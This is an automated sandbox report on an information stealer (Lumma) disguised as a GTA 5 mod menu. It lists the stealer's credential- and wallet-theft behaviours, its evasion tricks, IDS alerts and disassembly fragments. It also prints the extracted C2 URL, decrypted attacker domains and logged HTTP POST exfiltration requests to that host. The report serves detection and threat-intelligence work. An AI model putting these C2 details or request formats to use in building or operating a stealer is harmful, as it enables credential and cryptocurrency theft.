Edit tour

Windows Analysis Report
GTA-5-Mod-Menu-2025.exe

Overview

General Information

Sample name:	GTA-5-Mod-Menu-2025.exe
Analysis ID:	1582531
MD5:	97098e0b103acdf642b87d2b96155992
SHA1:	e6ffd40917dcb773e6cd7a9dba339cf967498c8a
SHA256:	cec32b81cc4dfb722928389bea59758bfe275da7b36732512d887a845053e191
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

GTA-5-Mod-Menu-2025.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe" MD5: 97098E0B103ACDF642B87D2B96155992)

conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GTA-5-Mod-Menu-2025.exe (PID: 64 cmdline: "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe" MD5: 97098E0B103ACDF642B87D2B96155992)

GTA-5-Mod-Menu-2025.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe" MD5: 97098E0B103ACDF642B87D2B96155992)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": "https://fancywaxxers.shop/api", "Build Version": "yau6Na--899083440"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T20:40:58.501835+0100	2028371	3	Unknown Traffic	192.168.2.6	49705	104.21.96.1	443	TCP
2024-12-30T20:40:59.471486+0100	2028371	3	Unknown Traffic	192.168.2.6	49706	104.21.96.1	443	TCP
2024-12-30T20:41:01.036591+0100	2028371	3	Unknown Traffic	192.168.2.6	49707	104.21.96.1	443	TCP
2024-12-30T20:41:02.335243+0100	2028371	3	Unknown Traffic	192.168.2.6	49708	104.21.96.1	443	TCP
2024-12-30T20:41:03.475678+0100	2028371	3	Unknown Traffic	192.168.2.6	49709	104.21.96.1	443	TCP
2024-12-30T20:41:05.142811+0100	2028371	3	Unknown Traffic	192.168.2.6	49710	104.21.96.1	443	TCP
2024-12-30T20:41:08.394830+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	104.21.96.1	443	TCP
2024-12-30T20:41:10.624047+0100	2028371	3	Unknown Traffic	192.168.2.6	49728	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T20:40:58.976794+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49705	104.21.96.1	443	TCP
2024-12-30T20:41:00.222152+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49706	104.21.96.1	443	TCP
2024-12-30T20:41:11.080134+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49728	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T20:40:58.976794+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49705	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T20:41:00.222152+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49706	104.21.96.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T20:41:07.345131+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49710	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/apie	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiH$0?	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api9v&?	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apizv	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/api_seed_date	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": "https://fancywaxxers.shop/api", "Build Version": "yau6Na--899083440"}

Multi AV Scanner detection for submitted file

Source: GTA-5-Mod-Menu-2025.exe

ReversingLabs: Detection: 31%

Machine Learning detection for sample

Source: GTA-5-Mod-Menu-2025.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String decryptor: yau6Na--899083440

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 4_2_004153E8 CryptUnprotectData,

4_2_004153E8

Source: GTA-5-Mod-Menu-2025.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49728 version: TLS 1.2

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F9B6A8 FindFirstFileExW,	0_2_00F9B6A8
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F9B759
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F9B6A8 FindFirstFileExW,	3_2_00F9B6A8
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00F9B759

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h	4_2_00437960
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0000009Ch]	4_2_00422111
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+36F5144Ah]	4_2_00426260
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx eax, byte ptr [ecx]	4_2_0043D2F7
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edi, byte ptr [ebx+eax-000000B4h]	4_2_0043DBCD
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+000001ACh]	4_2_00409BE0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx-6C56709Dh]	4_2_004153E8
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov ecx, eax	4_2_004153E8
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebp-39F33AEEh]	4_2_0043FC30
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0042BE7C
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx ecx, byte ptr [eax]	4_2_0043CFAA
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_0042786F
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-27BA1B42h]	4_2_0042A870
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov ecx, eax	4_2_00414804
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-6C5670A1h]	4_2_00414804
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-6C5670A1h]	4_2_00414804
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [edi], bl	4_2_00409010
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov word ptr [ecx], bp	4_2_0041C8D5
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-39F33AEEh]	4_2_0043F8A0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov word ptr [ecx], bp	4_2_0041C8BE
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then test eax, eax	4_2_00438950
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx eax, byte ptr [esi+edx-6C56709Dh]	4_2_00418166
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [eax], cl	4_2_00418166
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [ecx+edx*8], EACC7C31h	4_2_00418166
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov edx, dword ptr [esi+5Ch]	4_2_00416913
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+00h]	4_2_004029E0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	4_2_0041D9B0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi-1700508Ah]	4_2_004219B0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	4_2_004219B0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_004219B0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+7D4B075Fh]	4_2_0040C252
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	4_2_00424A08
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [ebx], cl	4_2_0041BA29
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0041B22A
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	4_2_0041B22A
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_004292F3
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h	4_2_00414280
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-6C5670A1h]	4_2_00414280
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov edx, dword ptr [ebp-30h]	4_2_00428BF0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edi, byte ptr [eax]	4_2_0043BB80
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	4_2_0043BB80
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]	4_2_0043BB80
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h	4_2_00419440
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	4_2_00419440
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_00427449
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_00427472
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov ecx, eax	4_2_0040CC10
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_00407430
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_00407430
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [ebx], cl	4_2_0041ACDA
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-0ECAA1D9h]	4_2_0041BCF0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0041BCF0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-10h]	4_2_00423C80
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov ecx, eax	4_2_0041B497
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0041B497
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov edi, eax	4_2_0041B5B9
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_00429E60
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov edi, eax	4_2_00428630
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edi, byte ptr [ebp+ecx-3107E08Dh]	4_2_00428630
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov word ptr [esi], ax	4_2_00409690
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then jmp eax	4_2_00438690
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00434E90
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov dword ptr [esp+00000100h], DAB1AE6Fh	4_2_0042AF4D
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then jmp eax	4_2_0040A706
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then jmp eax	4_2_0040A4B5
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-4DF122A2h]	4_2_00428F1F
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_00414F27
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then push eax	4_2_00427F32
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0000027Ch]	4_2_0042CF3F
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov byte ptr [eax], cl	4_2_0041A7C6
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then mov ecx, eax	4_2_0042AFEA
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 385488F2h	4_2_0040DF82

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49705 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49705 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49710 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49728 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://fancywaxxers.shop/api

Source: Joe Sandbox View

IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49705 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2PP8C865FU3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12821Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E4S8N39OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15049Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WAQFEYZ2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19907Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L7D6IRQA4TEVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1220Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=95Z0Z9TD6C7TMHMMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572287Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: fancywaxxers.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
